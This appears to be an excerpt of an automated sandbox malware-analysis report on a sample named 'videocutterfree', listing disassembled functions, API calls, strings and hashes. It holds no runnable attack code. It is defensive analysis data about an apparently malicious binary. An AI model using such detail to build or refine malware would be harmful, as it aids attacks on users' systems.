                                                                              • API String ID: 3265351223-3916222277
                                                                              • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                              • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                              • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                              • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_stricmp
                                                                              • String ID: log
                                                                              • API String ID: 912767213-2403297477
                                                                              • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                              • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                              • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                              • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099396A
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 009939C1
                                                                                • Part of subcall function 00991410: std::exception::exception.LIBCMT ref: 00991428
                                                                                • Part of subcall function 009993CD: __EH_prolog.LIBCMT ref: 009993D2
                                                                                • Part of subcall function 009993CD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009993E1
                                                                                • Part of subcall function 009993CD: __CxxThrowException@8.LIBCMT ref: 00999400
                                                                              Strings
                                                                              • Day of month is not valid for year, xrefs: 009939AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Day of month is not valid for year
                                                                              • API String ID: 1404951899-1521898139
                                                                              • Opcode ID: 6059344ea9648c49cad8dbdf6741479c0ded2d2972ea8eeb66b43e17a4130c40
                                                                              • Instruction ID: 0fa1b5af644ca00bd2f885554c7ffbf312345b2f6c365476643b679c4005bd54
                                                                              • Opcode Fuzzy Hash: 6059344ea9648c49cad8dbdf6741479c0ded2d2972ea8eeb66b43e17a4130c40
                                                                              • Instruction Fuzzy Hash: 72017576818209EADF14EF98D506BEEB778FF98720F00851AFC10A3251EB744A55C795
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_strnicmp
                                                                              • String ID: SQLITE_
                                                                              • API String ID: 1961171630-787686576
                                                                              • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                              • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                              • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                              • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                              APIs
                                                                              • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                              • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                              Strings
                                                                              • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                              • String ID: Invalid argument to rtreedepth()
                                                                              • API String ID: 1063208240-2843521569
                                                                              • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                              • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                              • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                              • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                              APIs
                                                                              • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                              • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                              • String ID: soft_heap_limit
                                                                              • API String ID: 1251656441-405162809
                                                                              • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                              • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                              • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                              • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                              APIs
                                                                              • std::exception::exception.LIBCMT ref: 0099E8C6
                                                                              • __CxxThrowException@8.LIBCMT ref: 0099E8DB
                                                                                • Part of subcall function 009A28FC: _malloc.LIBCMT ref: 009A2914
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                              • String ID: bad allocation
                                                                              • API String ID: 4063778783-2104205924
                                                                              • Opcode ID: 85fbef5c1b9c3a0e9f8f29c916977645226037507a2169394c16aebc729beda3
                                                                              • Instruction ID: 3ef5d30b1bd2c87a10072db3c37918e34786ee30928abb8e08b8f501ea59407c
                                                                              • Opcode Fuzzy Hash: 85fbef5c1b9c3a0e9f8f29c916977645226037507a2169394c16aebc729beda3
                                                                              • Instruction Fuzzy Hash: EDF082B050430DAB9F14E7ED9C16AEF77EC9B40314B500529B911E26C1EFB0EA0081D5
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00993C1B
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00993C30
                                                                                • Part of subcall function 009A1267: std::exception::exception.LIBCMT ref: 009A1271
                                                                                • Part of subcall function 00999406: __EH_prolog.LIBCMT ref: 0099940B
                                                                                • Part of subcall function 00999406: __CxxThrowException@8.LIBCMT ref: 00999434
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                              • String ID: bad cast
                                                                              • API String ID: 1300498068-3145022300
                                                                              • Opcode ID: e684aa0f8ba1b134436e58cf5d4d796cde5dfc257b150126222230d00a5c46b1
                                                                              • Instruction ID: 1131b83219d9dee0089d6d21484a88c851c12e44cd8ef6aab3be32317990acfd
                                                                              • Opcode Fuzzy Hash: e684aa0f8ba1b134436e58cf5d4d796cde5dfc257b150126222230d00a5c46b1
                                                                              • Instruction Fuzzy Hash: F3F0E572900508DBCB09EF5CD941BEAB779EF96321F00416EFD069B291DB729A46CBD0
                                                                              APIs
                                                                              • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                              • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_log
                                                                              • String ID: NULL
                                                                              • API String ID: 632333372-324932091
                                                                              • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                              • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                              • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                              • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00993886
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 009938A5
                                                                                • Part of subcall function 00991410: std::exception::exception.LIBCMT ref: 00991428
                                                                                • Part of subcall function 0099773B: _memmove.LIBCMT ref: 0099775B
                                                                              Strings
                                                                              • Day of month value is out of range 1..31, xrefs: 00993894
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Day of month value is out of range 1..31
                                                                              • API String ID: 3258419250-1361117730
                                                                              • Opcode ID: a25c9cc2a6921cc188cd3e38afd3d2c45aee50a3c0dbfcb55c93669942463ff1
                                                                              • Instruction ID: 2f14d93dda67759c08a117a54ac947f629cc0937eb7defa0614d7cae2c255349
                                                                              • Opcode Fuzzy Hash: a25c9cc2a6921cc188cd3e38afd3d2c45aee50a3c0dbfcb55c93669942463ff1
                                                                              • Instruction Fuzzy Hash: F4E0D872E082189BDB24BFDCC912BEDBBB8EB98B30F00455AF401732C1DAB1194087A1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 009938D2
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 009938F1
                                                                                • Part of subcall function 00991410: std::exception::exception.LIBCMT ref: 00991428
                                                                                • Part of subcall function 0099773B: _memmove.LIBCMT ref: 0099775B
                                                                              Strings
                                                                              • Year is out of valid range: 1400..10000, xrefs: 009938E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Year is out of valid range: 1400..10000
                                                                              • API String ID: 3258419250-2344417016
                                                                              • Opcode ID: 40ae69d3e2c070444e127a2f144793004d429bd5ca6c21a97ba24153a3d7799e
                                                                              • Instruction ID: c47a571d9147ce038810f7102c10a4d77c44b64e9cdab9846946379ab9dd3231
                                                                              • Opcode Fuzzy Hash: 40ae69d3e2c070444e127a2f144793004d429bd5ca6c21a97ba24153a3d7799e
                                                                              • Instruction Fuzzy Hash: 19E09272A1821897DB24ABDC8912BDDBBB8EB98720F00455AF80173281DAB1194087A1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099391E
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 0099393D
                                                                                • Part of subcall function 00991410: std::exception::exception.LIBCMT ref: 00991428
                                                                                • Part of subcall function 0099773B: _memmove.LIBCMT ref: 0099775B
                                                                              Strings
                                                                              • Month number is out of range 1..12, xrefs: 0099392C
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Month number is out of range 1..12
                                                                              • API String ID: 3258419250-4198407886
                                                                              • Opcode ID: cb7107f72338c23c04326c45292372ef036f04c1f13b7ae29c66ed058809e496
                                                                              • Instruction ID: eaa2f12b0c90d944dcf5ddd31e18869fb2cb63f90943ec2c07c571988ab83d87
                                                                              • Opcode Fuzzy Hash: cb7107f72338c23c04326c45292372ef036f04c1f13b7ae29c66ed058809e496
                                                                              • Instruction Fuzzy Hash: 47E09272A482189BDB24AFDC8952BDDBBB8EB98720F00455AF80163281DAB1294487E1
                                                                              APIs
                                                                              • TlsAlloc.KERNEL32 ref: 009919CC
                                                                              • GetLastError.KERNEL32 ref: 009919D9
                                                                                • Part of subcall function 00991712: __EH_prolog.LIBCMT ref: 00991717
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocErrorH_prologLast
                                                                              • String ID: tss
                                                                              • API String ID: 249634027-1638339373
                                                                              • Opcode ID: 9b2c0994d482538cb9d0b349fc64e51a6ae961694d138f9b41fc97dd7174ae18
                                                                              • Instruction ID: 58125eb4c4c75d758049a2f086ffd68579dd010b01cf9367c1984e9de33a2942
                                                                              • Opcode Fuzzy Hash: 9b2c0994d482538cb9d0b349fc64e51a6ae961694d138f9b41fc97dd7174ae18
                                                                              • Instruction Fuzzy Hash: 54E08632D186115BC7107B7DAD0909ABB94AA84370F108736FCB9C32E0EB3459449BC2
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00993BD8
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00993BED
                                                                                • Part of subcall function 009A1267: std::exception::exception.LIBCMT ref: 009A1271
                                                                                • Part of subcall function 00999406: __EH_prolog.LIBCMT ref: 0099940B
                                                                                • Part of subcall function 00999406: __CxxThrowException@8.LIBCMT ref: 00999434
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                              • String ID: bad cast
                                                                              • API String ID: 1300498068-3145022300
                                                                              • Opcode ID: 4bd3dffe26a6e7b82329eecf12cd4c8c491d465a6914925830655d1fbce5c47f
                                                                              • Instruction ID: 53e7dbbbd2f912f429abed0624027eb9d5f87877a3bea741664577955935b28f
                                                                              • Opcode Fuzzy Hash: 4bd3dffe26a6e7b82329eecf12cd4c8c491d465a6914925830655d1fbce5c47f
                                                                              • Instruction Fuzzy Hash: 70E01A71904108DBCB15EF58D642BB8BB74EB55324F00816DE81657291DB315A56CA91
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32 ref: 0040252D
                                                                              • GetCommandLineW.KERNEL32(?), ref: 0040B280
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CommandFileLineModuleName
                                                                              • String ID: DVCMediaPlugin
                                                                              • API String ID: 2151003578-4056201269
                                                                              • Opcode ID: 71392fe5a3be4fb78060ad3a8378c7b55e262e8708a40cbd385b64c612fed332
                                                                              • Instruction ID: bedbd4e46a4fd4a819c0a43bcafebb5618177e49726b5f5a860a52e84a032d73
                                                                              • Opcode Fuzzy Hash: 71392fe5a3be4fb78060ad3a8378c7b55e262e8708a40cbd385b64c612fed332
                                                                              • Instruction Fuzzy Hash: 46D0C7B1548016BAC215E790AA5C57E23599609755721043FF557B10C1CABC1146663E
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32 ref: 00402740
                                                                              • GetModuleFileNameA.KERNEL32(00000000), ref: 00402747
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040BC67
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Module$FileHandleName
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                              • API String ID: 4146042529-2036018995
                                                                              • Opcode ID: e9ce4c86d3cf87659a9eeeb01830d16e409caa451546f89b42d3a595222e8b7e
                                                                              • Instruction ID: d4c683b9484571c3381a6194b72dc698f9904dff4541561a02d8569ef51c7585
                                                                              • Opcode Fuzzy Hash: e9ce4c86d3cf87659a9eeeb01830d16e409caa451546f89b42d3a595222e8b7e
                                                                              • Instruction Fuzzy Hash: DFD0C9B0849205FECA108BA09E8DE6F36ACA704745B204833B703B30E0CABD4501A62E
                                                                              APIs
                                                                              • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404424,?,?,?,00000100,?,00000000), ref: 00404684
                                                                              • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404424,?,?,?,00000100,?,00000000), ref: 004046B8
                                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404424,?,?,?,00000100,?,00000000), ref: 004046D2
                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000,00404424,?,?,?,00000100,?,00000000), ref: 004046E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: AllocHeap$FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 3499195154-0
                                                                              • Opcode ID: 45119aa763da898996da901e331d9372f46da870962aa07eee90f07326892be3
                                                                              • Instruction ID: 81a64163ee6980f8680f2cf0fd42a529d9dee28e1af2c6baa0891a415d104b91
                                                                              • Opcode Fuzzy Hash: 45119aa763da898996da901e331d9372f46da870962aa07eee90f07326892be3
                                                                              • Instruction Fuzzy Hash: 1A116A70200301AFC721CF59EE459267BB6FB8A320711493DF256FA1B0D3769861CF19
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                              • String ID:
                                                                              • API String ID: 682475483-0
                                                                              • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                              • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                              • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                              • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2